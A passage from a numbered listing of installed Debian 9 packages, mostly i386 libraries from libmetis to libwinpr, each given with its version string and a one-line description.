  1222. libmetis5:i386 5.1.0.dfsg-5+b2 Serial Graph Partitioning and Fill-reducing Matrix Ordering
  1223. libmhash2:i386 0.9.9.9-7 Library for cryptographic hashing and message authentication
  1224. libminiupnpc10:i386 1.9.20140610-4 UPnP IGD client lightweight library
  1225. libmission-control-plugins0 1:5.16.3-2.1 management daemon for Telepathy (library for plugins)
  1226. libmjpegutils-2.1-0 1:2.1.0+debian-5 MJPEG capture/editing/replay and MPEG encoding toolset (library)
  1227. libmm-glib0:i386 1.6.4-1 D-Bus service for managing modems - shared libraries
  1228. libmms0:i386 0.6.4-2 MMS stream protocol library - shared library
  1229. libmng1:i386 1.0.10+dfsg-3.1+b5 Multiple-image Network Graphics library
  1230. libmnl0:i386 1.0.4-2 minimalistic Netlink communication library
  1231. libmodplug1:i386 1:0.8.8.5-3 shared libraries for mod music based on ModPlug
  1232. libmount1:i386 2.29.2-1 device mounting library
  1233. libmozjs-24-0:i386 24.2.0-5.1+b2 Spidermonkey JavaScript engine
  1234. libmp3lame0:i386 3.99.5+repack1-9+b2 MP3 encoding library
  1235. libmpc3:i386 1.0.3-1+b2 multiple precision complex floating-point library
  1236. libmpcdec6:i386 2:0.1~r495-1+b1 MusePack decoder - library
  1237. libmpdec2:i386 2.4.2-1 library for decimal floating point arithmetic (runtime library)
  1238. libmpeg2-4:i386 0.5.1-7+b2 MPEG1 and MPEG2 video decoder library
  1239. libmpeg2encpp-2.1-0 1:2.1.0+debian-5 MJPEG capture/editing/replay and MPEG encoding toolset (library)
  1240. libmpfr4:i386 3.1.5-1 multiple precision floating-point computation
  1241. libmpg123-0:i386 1.23.8-1+b1 MPEG layer 1/2/3 audio decoder (shared library)
  1242. libmplex2-2.1-0 1:2.1.0+debian-5 MJPEG capture/editing/replay and MPEG encoding toolset (library)
  1243. libmspub-0.1-1:i386 0.1.2-4+b1 library for parsing the mspub file structure
  1244. libmtdev1:i386 1.1.5-1+b1 Multitouch Protocol Translation Library - shared library
  1245. libmtp-common 1.1.13-1 Media Transfer Protocol (MTP) common files
  1246. libmtp-runtime 1.1.13-1 Media Transfer Protocol (MTP) runtime tools
  1247. libmtp9:i386 1.1.13-1 Media Transfer Protocol (MTP) library
  1248. libmusicbrainz5-2:i386 5.1.0+git20150707-6 Library to access the MusicBrainz.org database (C wrapper functions)
  1249. libmusicbrainz5cc2v5:i386 5.1.0+git20150707-6 Library to access the MusicBrainz.org database
  1250. libmutter0i:i386 3.22.3-2 window manager library from the Mutter window manager
  1251. libmwaw-0.3-3:i386 0.3.9-2 import library for some old Mac text documents
  1252. libmythes-1.2-0:i386 2:1.2.4-3 simple thesaurus library
  1253. libnatpmp1:i386 20110808-4+b1 portable and fully compliant implementation of NAT-PMP
  1254. libnautilus-extension1a:i386 3.22.3-1 libraries for nautilus components - runtime version
  1255. libncurses5:i386 6.0+20161126-1 shared libraries for terminal handling
  1256. libncursesw5:i386 6.0+20161126-1 shared libraries for terminal handling (wide character support)
  1257. libndp0:i386 1.6-1+b1 Library for Neighbor Discovery Protocol
  1258. libneon27-gnutls:i386 0.30.2-2 HTTP and WebDAV client library (GnuTLS enabled)
  1259. libnet-dbus-perl 1.1.0-4+b1 Perl extension for the DBus bindings
  1260. libnet-http-perl 6.12-1 module providing low-level HTTP connection client
  1261. libnet-smtp-ssl-perl 1.04-1 Perl module providing SSL support to Net::SMTP
  1262. libnet-ssleay-perl 1.80-1 Perl module for Secure Sockets Layer (SSL)
  1263. libnetfilter-conntrack3:i386 1.0.6-2 Netfilter netlink-conntrack library
  1264. libnetpbm10 2:10.0-15.3+b2 Graphics conversion tools shared libraries
  1265. libnettle6:i386 3.3-1+b1 low level cryptographic library (symmetric and one-way cryptos)
  1266. libnewt0.52:i386 0.52.19-1+b1 Not Erik's Windowing Toolkit - text mode windowing with slang
  1267. libnfnetlink0:i386 1.0.1-3 Netfilter netlink library
  1268. libnfs8:i386 1.11.0-2 NFS client library (shared library)
  1269. libnghttp2-14:i386 1.18.1-1 library implementing HTTP/2 protocol (shared library)
  1270. libnl-3-200:i386 3.2.27-2 library for dealing with netlink sockets
  1271. libnl-genl-3-200:i386 3.2.27-2 library for dealing with netlink sockets - generic netlink
  1272. libnm-glib4:i386 1.6.2-3 network management framework (GLib shared library)
  1273. libnm-gtk0:i386 1.4.4-1 library for wireless and mobile dialogs (libnm-glib version)
  1274. libnm-util2:i386 1.6.2-3 network management framework (shared library)
  1275. libnm0:i386 1.6.2-3 GObject-based client library for NetworkManager
  1276. libnma0:i386 1.4.4-1 library for wireless and mobile dialogs (libnm version)
  1277. libnotify4:i386 0.7.7-2 sends desktop notifications to a notification daemon
  1278. libnpth0:i386 1.3-1 replacement for GNU Pth using system threads
  1279. libnspr4:i386 2:4.12-6 NetScape Portable Runtime Library
  1280. libnss-mdns:i386 0.10-8 NSS module for Multicast DNS name resolution
  1281. libnss-myhostname:i386 232-25 nss module providing fallback resolution for the current hostname
  1282. libnss3:i386 2:3.26.2-1.1 Network Security Service libraries
  1283. libntfs-3g871 1:2016.2.22AR.1+dfsg-1 read/write NTFS driver for FUSE (runtime library)
  1284. libnuma1:i386 2.0.11-2.1 Libraries for controlling NUMA policy
  1285. liboauth0:i386 1.0.1-1 C library for implementing OAuth 1.0
  1286. libodfgen-0.1-1:i386 0.1.6-2 library to generate ODF documents
  1287. libofa0:i386 0.9.3-15 library for acoustic fingerprinting
  1288. libogg0:i386 1.3.2-1 Ogg bitstream library
  1289. libopenal-data 1:1.17.2-4 Software implementation of the OpenAL audio API (data files)
  1290. libopenal1:i386 1:1.17.2-4+b2 Software implementation of the OpenAL audio API (shared library)
  1291. libopencore-amrnb0:i386 0.1.3-2.1+b2 Adaptive Multi Rate speech codec - shared library
  1292. libopencore-amrwb0:i386 0.1.3-2.1+b2 Adaptive Multi-Rate - Wideband speech codec - shared library
  1293. libopencv-calib3d2.4v5:i386 2.4.9.1+dfsg1-2 computer vision Camera Calibration library
  1294. libopencv-core2.4v5:i386 2.4.9.1+dfsg1-2 computer vision core library
  1295. libopencv-features2d2.4v5:i386 2.4.9.1+dfsg1-2 computer vision Feature Detection and Descriptor Extraction library
  1296. libopencv-flann2.4v5:i386 2.4.9.1+dfsg1-2 computer vision Clustering and Search in Multi-Dimensional spaces library
  1297. libopencv-highgui2.4-deb0:i386 2.4.9.1+dfsg1-2 computer vision High-level GUI and Media I/O library
  1298. libopencv-imgproc2.4v5:i386 2.4.9.1+dfsg1-2 computer vision Image Processing library
  1299. libopencv-objdetect2.4v5:i386 2.4.9.1+dfsg1-2 computer vision Object Detection library
  1300. libopencv-video2.4v5:i386 2.4.9.1+dfsg1-2 computer vision Video analysis library
  1301. libopenexr22:i386 2.2.0-11+b1 runtime files for the OpenEXR image library
  1302. libopenjp2-7:i386 2.1.2-1.1 JPEG 2000 image compression/decompression library
  1303. libopenmpt0:i386 0.2.7386~beta20.3-3 module music library based on OpenMPT -- shared library
  1304. libopus0:i386 1.2~alpha2-1 Opus codec runtime library
  1305. liborc-0.4-0:i386 1:0.4.26-2 Library of Optimized Inner Loops Runtime Compiler
  1306. liborcus-0.11-0:i386 0.11.2-3+b1 library for processing spreadsheet documents
  1307. libosinfo-1.0-0:i386 1.0.0-2 Library for managing information about operating systems and hypervisors
  1308. libp11-kit0:i386 0.23.3-2 library for loading and coordinating access to PKCS#11 modules - runtime
  1309. libpackagekit-glib2-18:i386 1.1.5-2 Library for accessing PackageKit using GLib
  1310. libpagemaker-0.0-0:i386 0.0.3-2 Library for importing and converting PageMaker Documents
  1311. libpam-cap:i386 1:2.25-1 POSIX 1003.1e capabilities (PAM module)
  1312. libpam-gnome-keyring:i386 3.20.0-3 PAM module to unlock the GNOME keyring upon login
  1313. libpam-modules:i386 1.1.8-3.6 Pluggable Authentication Modules for PAM
  1314. libpam-modules-bin 1.1.8-3.6 Pluggable Authentication Modules for PAM - helper binaries
  1315. libpam-runtime 1.1.8-3.6 Runtime support for the PAM library
  1316. libpam-systemd:i386 232-25 system and service manager - PAM module
  1317. libpam0g:i386 1.1.8-3.6 Pluggable Authentication Modules library
  1318. libpango-1.0-0:i386 1.40.5-1 Layout and rendering of internationalized text
  1319. libpango-perl 1.227-1+b1 Perl module to layout and render international text
  1320. libpangocairo-1.0-0:i386 1.40.5-1 Layout and rendering of internationalized text
  1321. libpangoft2-1.0-0:i386 1.40.5-1 Layout and rendering of internationalized text
  1322. libpangomm-1.4-1v5:i386 2.40.1-3 C++ Wrapper for pango (shared libraries)
  1323. libpangoxft-1.0-0:i386 1.40.5-1 Layout and rendering of internationalized text
  1324. libpaper-utils 1.1.24+nmu5 library for handling paper characteristics (utilities)
  1325. libpaper1:i386 1.1.24+nmu5 library for handling paper characteristics
  1326. libparted2:i386 3.2-17 disk partition manipulator - shared library
  1327. libpcap0.8:i386 1.8.1-3 system interface for user-level packet capture
  1328. libpci3:i386 1:3.5.2-1 Linux PCI Utilities (shared library)
  1329. libpciaccess0:i386 0.13.4-1+b2 Generic PCI access library for X
  1330. libpcre2-8-0:i386 10.22-3 New Perl Compatible Regular Expression Library- 8 bit runtime files
  1331. libpcre3:i386 2:8.39-3 Old Perl 5 Compatible Regular Expression Library - runtime files
  1332. libpcsclite1:i386 1.8.20-1 Middleware to access a smart card using PC/SC (library)
  1333. libpeas-1.0-0:i386 1.20.0-1+b1 Application plugin library
  1334. libpeas-common 1.20.0-1 Application plugin library (common files)
  1335. libperl4-corelibs-perl 0.003-2 libraries historically supplied with Perl 4
  1336. libperl5.24:i386 5.24.1-3 shared Perl library
  1337. libpgm-5.2-0:i386 5.2.122~dfsg-2 OpenPGM shared library
  1338. libphodav-2.0-0:i386 2.1-1 WebDAV server implementation using libsoup
  1339. libphodav-2.0-common 2.1-1 WebDAV server implementation using libsoup (common files)
  1340. libphonenumber7:i386 7.1.0-5+b1 parsing/formatting/validating phone numbers
  1341. libpipeline1:i386 1.4.1-2 pipeline manipulation library
  1342. libpixman-1-0:i386 0.34.0-1 pixel-manipulation library for X and cairo
  1343. libplist3:i386 1.12+git+1+e37ca00-0.3 Library for handling Apple binary and XML property lists
  1344. libpng16-16:i386 1.6.28-1 PNG library - runtime (version 1.6)
  1345. libpolkit-agent-1-0:i386 0.105-18 PolicyKit Authentication Agent API
  1346. libpolkit-backend-1-0:i386 0.105-18 PolicyKit backend API
  1347. libpolkit-gobject-1-0:i386 0.105-18 PolicyKit Authorization API
  1348. libpoppler-glib8:i386 0.48.0-2 PDF rendering library (GLib-based shared library)
  1349. libpoppler64:i386 0.48.0-2 PDF rendering library
  1350. libpopt0:i386 1.16-10+b2 lib for parsing cmdline parameters
  1351. libpostproc54:i386 7:3.2.5-1 FFmpeg library for post processing - runtime files
  1352. libpotrace0 1.13-3 library for tracing bitmaps
  1353. libprocps6:i386 2:3.3.12-3 library for accessing process information from /proc
  1354. libprotobuf10:i386 3.0.0-9 protocol buffers C++ library
  1355. libproxy1-plugin-gsettings:i386 0.4.14-2 automatic proxy configuration management library (GSettings plugin)
  1356. libproxy1-plugin-networkmanager:i386 0.4.14-2 automatic proxy configuration management library (Network Manager plugin)
  1357. libproxy1v5:i386 0.4.14-2 automatic proxy configuration management library (shared)
  1358. libpsl5:i386 0.17.0-3 Library for Public Suffix List (shared libraries)
  1359. libpst4:i386 0.6.59-1+b1 library for reading Microsoft Outlook PST files
  1360. libpulse-mainloop-glib0:i386 10.0-1 PulseAudio client libraries (glib support)
  1361. libpulse0:i386 10.0-1 PulseAudio client libraries
  1362. libpulsedsp:i386 10.0-1 PulseAudio OSS pre-load library
  1363. libpwquality-common 1.3.0-1 library for password quality checking and generation (data files)
  1364. libpwquality1:i386 1.3.0-1+b1 library for password quality checking and generation
  1365. libpython-stdlib:i386 2.7.13-2 interactive high-level object-oriented language (default python version)
  1366. libpython2.7:i386 2.7.13-2 Shared Python runtime library (version 2.7)
  1367. libpython2.7-minimal:i386 2.7.13-2 Minimal subset of the Python language (version 2.7)
  1368. libpython2.7-stdlib:i386 2.7.13-2 Interactive high-level object-oriented language (standard library, version 2.7)
  1369. libpython3-stdlib:i386 3.5.3-1 interactive high-level object-oriented language (default python3 version)
  1370. libpython3.5:i386 3.5.3-1 Shared Python runtime library (version 3.5)
  1371. libpython3.5-minimal:i386 3.5.3-1 Minimal subset of the Python language (version 3.5)
  1372. libpython3.5-stdlib:i386 3.5.3-1 Interactive high-level object-oriented language (standard library, version 3.5)
  1373. libqmi-glib5:i386 1.16.2-1 Support library to use the Qualcomm MSM Interface (QMI) protocol
  1374. libqmi-proxy 1.16.2-1 Proxy to communicate with QMI ports
  1375. libqpdf17:i386 6.0.0-2 runtime library for PDF transformation/inspection software
  1376. libqqwing2v5:i386 1.3.4-1.1 tool for generating and solving Sudoku puzzles (library)
  1377. libquadmath0:i386 6.3.0-18 GCC Quad-Precision Math Library
  1378. libquvi-0.9-0.9.3:i386 0.9.3-1.2 library for parsing video download links (runtime libraries)
  1379. libquvi-scripts-0.9 0.9.20131130-1.1 library for parsing video download links (Lua scripts)
  1380. libraptor2-0:i386 2.0.14-1+b1 Raptor 2 RDF syntax library
  1381. librarian0 0.8.1-6+b1 Documentation meta-data library (library package)
  1382. librasqal3:i386 0.9.32-1+b1 Rasqal RDF query library
  1383. libraw1394-11:i386 2.1.2-1+b1 library for direct access to IEEE 1394 bus (aka FireWire)
  1384. libraw15:i386 0.17.2-6+deb9u1 raw image decoder library
  1385. librdf0:i386 1.0.17-1.1 Redland Resource Description Framework (RDF) library
  1386. libreadline7:i386 7.0-3 GNU readline and history libraries, run-time libraries
  1387. libreoffice 1:5.2.7-1 office productivity suite (metapackage)
  1388. libreoffice-avmedia-backend-gstreamer 1:5.2.7-1 GStreamer backend for LibreOffice
  1389. libreoffice-base 1:5.2.7-1 office productivity suite -- database
  1390. libreoffice-base-core 1:5.2.7-1 office productivity suite -- shared library
  1391. libreoffice-base-drivers 1:5.2.7-1 Database connectivity drivers for LibreOffice
  1392. libreoffice-calc 1:5.2.7-1 office productivity suite -- spreadsheet
  1393. libreoffice-common 1:5.2.7-1 office productivity suite -- arch-independent files
  1394. libreoffice-core 1:5.2.7-1 office productivity suite -- arch-dependent files
  1395. libreoffice-draw 1:5.2.7-1 office productivity suite -- drawing
  1396. libreoffice-evolution 1:5.2.7-1 office productivity suite -- Evolution addressbook support
  1397. libreoffice-gnome 1:5.2.7-1 office productivity suite -- GNOME integration
  1398. libreoffice-gtk3 1:5.2.7-1 office productivity suite -- GTK+ 3 integration
  1399. libreoffice-help-en-us 1:5.2.7-1 office productivity suite -- English_american help
  1400. libreoffice-impress 1:5.2.7-1 office productivity suite -- presentation
  1401. libreoffice-java-common 1:5.2.7-1 office productivity suite -- arch-independent Java support files
  1402. libreoffice-math 1:5.2.7-1 office productivity suite -- equation editor
  1403. libreoffice-report-builder-bin 1:5.2.7-1 LibreOffice component for building database reports -- libraries
  1404. libreoffice-sdbc-hsqldb 1:5.2.7-1 HSQLDB SDBC driver for LibreOffice
  1405. libreoffice-style-galaxy 1:5.2.7-1 office productivity suite -- Galaxy (Default) symbol style
  1406. libreoffice-style-tango 1:5.2.7-1 office productivity suite -- Tango symbol style
  1407. libreoffice-writer 1:5.2.7-1 office productivity suite -- word processor
  1408. librest-0.7-0:i386 0.8.0-2 REST service access library
  1409. librevenge-0.0-0:i386 0.0.4-6 Base Library for writing document interface filters
  1410. librhythmbox-core10:i386 3.4.1-2+b1 support library for the rhythmbox music player
  1411. librsvg2-2:i386 2.40.16-1+b1 SAX-based renderer library for SVG files (runtime)
  1412. librsvg2-common:i386 2.40.16-1+b1 SAX-based renderer library for SVG files (extra runtime)
  1413. librtmp1:i386 2.4+20151223.gitfa8646d.1-1+b1 toolkit for RTMP streams (shared library)
  1414. librubberband2:i386 1.8.1-7 audio time-stretching and pitch-shifting library
  1415. librygel-core-2.6-2 0.32.1-3 GNOME UPnP/DLNA services - core library
  1416. librygel-db-2.6-2 0.32.1-3 GNOME UPnP/DLNA services - db library
  1417. librygel-renderer-2.6-2 0.32.1-3 GNOME UPnP/DLNA services - renderer library
  1418. librygel-renderer-gst-2.6-2 0.32.1-3 GNOME UPnP/DLNA services - renderer library
  1419. librygel-server-2.6-2 0.32.1-3 GNOME UPnP/DLNA services - server library
  1420. libsamplerate0:i386 0.1.8-8+b2 Audio sample rate conversion library
  1421. libsane:i386 1.0.25-4.1 API library for scanners
  1422. libsane-common 1.0.25-4.1 API library for scanners -- documentation and support files
  1423. libsane-extras:i386 1.0.22.4 API library for scanners -- extra backends
  1424. libsane-extras-common 1.0.22.4 API library for scanners -- documentation and support files
  1425. libsane-hpaio:i386 3.16.11+repack0-3 HP SANE backend for multi-function peripherals
  1426. libsasl2-2:i386 2.1.27~101-g0780600+dfsg-3 Cyrus SASL - authentication abstraction library
  1427. libsasl2-modules:i386 2.1.27~101-g0780600+dfsg-3 Cyrus SASL - pluggable authentication modules
  1428. libsasl2-modules-db:i386 2.1.27~101-g0780600+dfsg-3 Cyrus SASL - pluggable authentication modules (DB)
  1429. libsbc1:i386 1.3-2 Sub Band CODEC library - runtime
  1430. libsdl1.2debian:i386 1.2.15+dfsg1-4 Simple DirectMedia Layer
  1431. libseccomp2:i386 2.3.1-2.1 high level interface to Linux seccomp filter
  1432. libsecret-1-0:i386 0.18.5-3.1 Secret store
  1433. libsecret-common 0.18.5-3.1 Secret store (common files)
  1434. libselinux1:i386 2.6-3+b1 SELinux runtime shared libraries
  1435. libsemanage-common 2.6-2 Common files for SELinux policy management libraries
  1436. libsemanage1:i386 2.6-2 SELinux policy management library
  1437. libsensors4:i386 1:3.4.0-4 library to read temperature/voltage/fan sensors
  1438. libsepol1:i386 2.6-2 SELinux library for manipulating binary security policies
  1439. libserd-0-0:i386 0.26.0~dfsg0-1 lightweight RDF syntax library
  1440. libservlet3.1-java 8.5.14-1+deb9u1 Servlet 3.1, JSP 2.3, EL 3.0 and WebSocket 1.0 Java API classes
  1441. libsgutils2-2 1.42-2 utilities for devices using the SCSI command set (shared libraries)
  1442. libshine3:i386 3.1.0-5 Fixed-point MP3 encoding library - runtime files
  1443. libshout3:i386 2.3.1-3 MP3/Ogg Vorbis broadcast streaming library
  1444. libsidplay1v5 1.36.59-10 SID (MOS 6581) emulation library
  1445. libsigc++-2.0-0v5:i386 2.10.0-1 type-safe Signal Framework for C++ - runtime
  1446. libsigsegv2:i386 2.10-5 Library for handling page faults in a portable way
  1447. libslang2:i386 2.3.1-5 S-Lang programming library - runtime version
  1448. libsm6:i386 2:1.2.2-1+b3 X11 Session Management library
  1449. libsmartcols1:i386 2.29.2-1 smart column output alignment library
  1450. libsmbclient:i386 2:4.5.8+dfsg-2+deb9u1+b1 shared library for communication with SMB/CIFS servers
  1451. libsnappy1v5:i386 1.1.3-3 fast compression/decompression library
  1452. libsndfile1:i386 1.0.27-3 Library for reading/writing audio files
  1453. libsndio6.1:i386 1.1.0-3 Small audio and MIDI framework from OpenBSD, runtime libraries
  1454. libsnmp-base 5.7.3+dfsg-1.7 SNMP configuration script, MIBs and documentation
  1455. libsnmp30:i386 5.7.3+dfsg-1.7 SNMP (Simple Network Management Protocol) library
  1456. libsodium18:i386 1.0.11-2 Network communication, cryptography and signaturing library
  1457. libsord-0-0:i386 0.16.0~dfsg0-1+b1 library for storing RDF data in memory
  1458. libsoundtouch1:i386 1.9.2-2+b1 Sound stretching library
  1459. libsoup-gnome2.4-1:i386 2.56.0-2+deb9u1 HTTP library implementation in C -- GNOME support library
  1460. libsoup2.4-1:i386 2.56.0-2+deb9u1 HTTP library implementation in C -- Shared library
  1461. libsoxr0:i386 0.1.2-2 High quality 1D sample-rate conversion library
  1462. libspandsp2:i386 0.0.6+dfsg-0.1 Telephony signal processing library
  1463. libspectre1:i386 0.2.8-1 Library for rendering PostScript documents
  1464. libspeechd2:i386 0.8.6-4 Speech Dispatcher: Shared libraries
  1465. libspeex1:i386 1.2~rc1.2-1+b2 The Speex codec runtime library
  1466. libspeexdsp1:i386 1.2~rc1.2-1+b2 The Speex extended runtime library
  1467. libspice-client-glib-2.0-8:i386 0.33-3.3 GObject for communicating with Spice servers (runtime library)
  1468. libspice-client-gtk-3.0-5:i386 0.33-3.3 GTK3 widget for SPICE clients (runtime library)
  1469. libsqlite3-0:i386 3.16.2-5 SQLite 3 shared library
  1470. libsratom-0-0:i386 0.6.0~dfsg0-1 library for serialising LV2 atoms to/from Turtle
  1471. libsrtp0 1.4.5~20130609~dfsg-2 Secure RTP (SRTP) and UST Reference Implementations - shared library
  1472. libss2:i386 1.43.4-2 command-line interface parsing library
  1473. libssh-gcrypt-4:i386 0.7.3-2 tiny C SSH library (gcrypt flavor)
  1474. libssh2-1:i386 1.7.0-1 SSH2 client-side library
  1475. libssl1.0.2:i386 1.0.2l-2 Secure Sockets Layer toolkit - shared libraries
  1476. libssl1.1:i386 1.1.0f-3 Secure Sockets Layer toolkit - shared libraries
  1477. libstartup-notification0:i386 0.12-4+b2 library for program launch feedback (shared library)
  1478. libstdc++6:i386 6.3.0-18 GNU Standard C++ Library v3
  1479. libstemmer0d:i386 0+svn585-1+b2 Snowball stemming algorithms for use in Information Retrieval
  1480. libsuitesparseconfig4:i386 1:4.5.4-1 configuration routines for all SuiteSparse modules
  1481. libswitch-perl 2.17-2 switch statement for Perl
  1482. libswresample2:i386 7:3.2.5-1 FFmpeg library for audio resampling, rematrixing etc. - runtime files
  1483. libswscale4:i386 7:3.2.5-1 FFmpeg library for image scaling and various conversions - runtime files
  1484. libsystemd0:i386 232-25 systemd utility library
  1485. libtag1v5:i386 1.11.1+dfsg.1-0.1 audio meta-data library
  1486. libtag1v5-vanilla:i386 1.11.1+dfsg.1-0.1 audio meta-data library - vanilla flavour
  1487. libtagc0:i386 1.11.1+dfsg.1-0.1 audio meta-data library - C bindings
  1488. libtalloc2:i386 2.1.8-1 hierarchical pool based memory allocator
  1489. libtasn1-6:i386 4.10-1.1 Manage ASN.1 structures (runtime)
  1490. libtbb2:i386 4.3~20150611-2 parallelism library for C++ - runtime files
  1491. libtcl8.6:i386 8.6.6+dfsg-1+b1 Tcl (the Tool Command Language) v8.6 - run-time library files
  1492. libtdb1:i386 1.3.11-2 Trivial Database - shared library
  1493. libteamdctl0:i386 1.26-1+b1 library for communication with `teamd` process
  1494. libtelepathy-glib0:i386 0.24.1-1.1 Telepathy framework - GLib library
  1495. libtelepathy-logger3:i386 0.8.2-2 Telepathy logger service - utility library
  1496. libtevent0:i386 0.9.31-1 talloc-based event loop library - shared library
  1497. libtext-charwidth-perl 0.04-7+b5 get display widths of characters on the terminal
  1498. libtext-iconv-perl 1.7-5+b4 converts between character sets in Perl
  1499. libtext-wrapi18n-perl 0.06-7.1 internationalized substitute of Text::Wrap
  1500. libthai-data 0.1.26-1 Data files for Thai language support library
  1501. libthai0:i386 0.1.26-1 Thai language support library
  1502. libtheora0:i386 1.1.1+dfsg.1-14+b1 Theora Video Compression Codec
  1503. libtie-ixhash-perl 1.23-2 Perl module to order associative arrays
  1504. libtiff5:i386 4.0.8-2+deb9u1 Tag Image File Format (TIFF) library
  1505. libtimedate-perl 2.3000-2 collection of modules to manipulate date/time information
  1506. libtinfo5:i386 6.0+20161126-1 shared low-level terminfo library for terminal handling
  1507. libtk8.6:i386 8.6.6-1+b1 Tk toolkit for Tcl and X11 v8.6 - run-time files
  1508. libtotem-plparser-common 3.10.7-1 Totem Playlist Parser library - common files
  1509. libtotem-plparser18:i386 3.10.7-1+b1 Totem Playlist Parser library - runtime files
  1510. libtotem0:i386 3.22.1-1 Main library for the Totem media player
  1511. libtracker-control-1.0-0:i386 1.10.5-1 library to control/monitor tracker miners
  1512. libtracker-miner-1.0-0:i386 1.10.5-1 tracker data miner library
  1513. libtracker-sparql-1.0-0:i386 1.10.5-1 metadata database, indexer and search tool - library
  1514. libtwolame0:i386 0.3.13-2 MPEG Audio Layer 2 encoding library
  1515. libtxc-dxtn-s2tc:i386 1.0+git20151227-2 Texture compression library for Mesa
  1516. libudev1:i386 232-25 libudev shared library
  1517. libudisks2-0:i386 2.1.8-1 GObject based library to access udisks2
  1518. libumfpack5:i386 1:4.5.4-1 sparse LU factorization library
  1519. libunistring0:i386 0.9.6+really0.9.3-0.1 Unicode string library for C
  1520. libupower-glib3:i386 0.99.4-4+b1 abstraction for power management - shared library
  1521. liburi-perl 1.71-1 module to manipulate and access URI strings
  1522. libusb-0.1-4:i386 2:0.1.12-30 userspace USB programming library
  1523. libusb-1.0-0:i386 2:1.0.21-1 userspace USB programming library
  1524. libusbmuxd4:i386 1.0.10-3+b1 USB multiplexor daemon for iPhone and iPod Touch devices - library
  1525. libusbredirhost1:i386 0.7.1-1 Implementing the usb-host (*) side of a usbredir connection (runtime)
  1526. libusbredirparser1:i386 0.7.1-1 Parser for the usbredir protocol (runtime)
  1527. libustr-1.0-1:i386 1.0.4-6 Micro string library: shared library
  1528. libutempter0:i386 1.1.6-3 privileged helper for utmp/wtmp updates (runtime)
  1529. libuuid1:i386 2.29.2-1 Universally Unique ID library
  1530. libv4l-0:i386 1.12.3-1 Collection of video4linux support libraries
  1531. libv4lconvert0:i386 1.12.3-1 Video4linux frame format conversion library
  1532. libva-drm1:i386 1.7.3-2 Video Acceleration (VA) API for Linux -- DRM runtime
  1533. libva-x11-1:i386 1.7.3-2 Video Acceleration (VA) API for Linux -- X11 runtime
  1534. libva1:i386 1.7.3-2 Video Acceleration (VA) API for Linux -- runtime
  1535. libvdpau-va-gl1:i386 0.4.2-1 VDPAU driver with OpenGL/VAAPI backend
  1536. libvdpau1:i386 1.1.1-6 Video Decode and Presentation API for Unix (libraries)
  1537. libvisio-0.1-1:i386 0.1.5-4+b1 library for parsing the visio file structure
  1538. libvisual-0.4-0:i386 0.4.0-10 audio visualization framework
  1539. libvo-aacenc0:i386 0.1.3-1 VisualOn AAC encoder library
  1540. libvo-amrwbenc0:i386 0.1.3-1 VisualOn AMR-WB encoder library
  1541. libvorbis0a:i386 1.3.5-4 decoder library for Vorbis General Audio Compression Codec
  1542. libvorbisenc2:i386 1.3.5-4 encoder library for Vorbis General Audio Compression Codec
  1543. libvorbisfile3:i386 1.3.5-4 high-level API for Vorbis General Audio Compression Codec
  1544. libvpx4:i386 1.6.1-3 VP8 and VP9 video codec (shared library)
  1545. libvte-2.91-0:i386 0.46.1-1 Terminal emulator widget for GTK+ 3.0 - runtime files
  1546. libvte-2.91-common 0.46.1-1 Terminal emulator widget for GTK+ 3.0 - common files
  1547. libwacom-bin 0.22-1+b1 Wacom model feature query library -- binaries
  1548. libwacom-common 0.22-1 Wacom model feature query library (common files)
  1549. libwacom2:i386 0.22-1+b1 Wacom model feature query library
  1550. libwavpack1:i386 5.0.0-2 audio codec (lossy and lossless) - library
  1551. libwayland-client0:i386 1.12.0-1 wayland compositor infrastructure - client library
  1552. libwayland-cursor0:i386 1.12.0-1 wayland compositor infrastructure - cursor library
  1553. libwayland-egl1-mesa:i386 13.0.6-1+b2 implementation of the Wayland EGL platform -- runtime
  1554. libwayland-server0:i386 1.12.0-1 wayland compositor infrastructure - server library
  1555. libwbclient0:i386 2:4.5.8+dfsg-2+deb9u1+b1 Samba winbind client library
  1556. libwebkit2gtk-4.0-37:i386 2.16.3-2 Web content engine library for GTK+
  1557. libwebp6:i386 0.5.2-1 Lossy compression of digital photographic images.
  1558. libwebpdemux2:i386 0.5.2-1 Lossy compression of digital photographic images.
  1559. libwebpmux2:i386 0.5.2-1 Lossy compression of digital photographic images.
  1560. libwebrtc-audio-processing1:i386 0.3-1 AudioProcessing module from the WebRTC project.
  1561. libwildmidi-config 0.4.0-2 software MIDI player configuration
  1562. libwildmidi2:i386 0.4.0-2+b2 software MIDI player library
  1563. libwinpr-crt0.1:i386 1.1.0~git20140921.1.440916e+dfsg1-13+deb9u1 Windows Portable Runtime library (crt library)
  1564. libwinpr-crypto0.1:i386 1.1.0~git20140921.1.440916e+dfsg1-13+deb9u1 Windows Portable Runtime library (crypto library)
  1565. libwinpr-dsparse0.1:i386 1.1.0~git20140921.1.440916e+dfsg1-13+deb9u1 Windows Portable Runtime library (dsparse library)
  1566. libwinpr-environment0.1:i386 1.1.0~git20140921.1.440916e+dfsg1-13+deb9u1 Windows Portable Runtime library (environment library)
  1567. libwinpr-file0.1:i386 1.1.0~git20140921.1.440916e+dfsg1-13+deb9u1 Windows Portable Runtime library (file library)
  1568. libwinpr-handle0.1:i386 1.1.0~git20140921.1.440916e+dfsg1-13+deb9u1 Windows Portable Runtime library (handle library)
  1569. libwinpr-heap0.1:i386 1.1.0~git20140921.1.440916e+dfsg1-13+deb9u1 Windows Portable Runtime library (heap library)
  1570. libwinpr-input0.1:i386 1.1.0~git20140921.1.440916e+dfsg1-13+deb9u1 Windows Portable Runtime library (input library)
  1571. libwinpr-interlocked0.1:i386 1.1.0~git20140921.1.440916e+dfsg1-13+deb9u1 Windows Portable Runtime library (interlocked library)
  1572. libwinpr-library0.1:i386 1.1.0~git20140921.1.440916e+dfsg1-13+deb9u1 Windows Portable Runtime library (library)
  1573. libwinpr-path0.1:i386 1.1.0~git20140921.1.440916e+dfsg1-13+deb9u1 Windows Portable Runtime library (path library)
  1574. libwinpr-pool0.1:i386 1.1.0~git20140921.1.440916e+dfsg1-13+deb9u1 Windows Portable Runtime library (pool library)
  1575. libwinpr-registry0.1:i386 1.1.0~git20140921.1.440916e+dfsg1-13+deb9u1 Windows Portable Runtime library (registry library)
  1576. libwinpr-rpc0.1:i386 1.1.0~git20140921.1.440916e+dfsg1-13+deb9u1 Windows Portable Runtime library (RPC library)
  1577. libwinpr-sspi0.1:i386 1.1.0~git20140921.1.440916e+dfsg1-13+deb9u1 Windows Portable Runtime library (sspi library)
